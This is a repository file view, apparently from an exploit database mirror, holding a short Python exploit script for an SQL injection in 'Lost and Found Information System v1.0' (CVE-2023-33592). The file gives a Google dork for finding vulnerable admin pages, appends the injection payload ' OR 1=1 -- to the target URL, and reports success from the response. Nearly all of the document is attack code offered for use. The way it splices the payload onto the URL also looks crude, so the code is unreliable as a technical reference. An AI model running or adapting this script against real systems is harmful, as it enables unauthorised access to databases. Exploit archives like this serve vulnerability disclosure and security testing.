e2ea5c0412
4 changes to exploits/shellcodes/ghdb Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated) Lost and Found Information System v1.0 - SQL Injection Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
24 lines
No EOL
732 B
Python
Executable file
24 lines
No EOL
732 B
Python
Executable file
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
|
|
# Date: 2023-06-30
|
|
# country: Iran
|
|
# Exploit Author: Amirhossein Bahramizadeh
|
|
# Category : webapps
|
|
# Dork : /php-lfis/admin/?page=system_info/contact_information
|
|
# Tested on: Windows/Linux
|
|
# CVE : CVE-2023-33592
|
|
import requests
|
|
|
|
# URL of the vulnerable component
|
|
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"
|
|
|
|
# Injecting a SQL query to exploit the vulnerability
|
|
payload = "' OR 1=1 -- "
|
|
|
|
# Send the request with the injected payload
|
|
response = requests.get(url + payload)
|
|
|
|
# Check if the SQL injection was successful
|
|
if "admin" in response.text:
|
|
print("SQL injection successful!")
|
|
else:
|
|
print("SQL injection failed.") |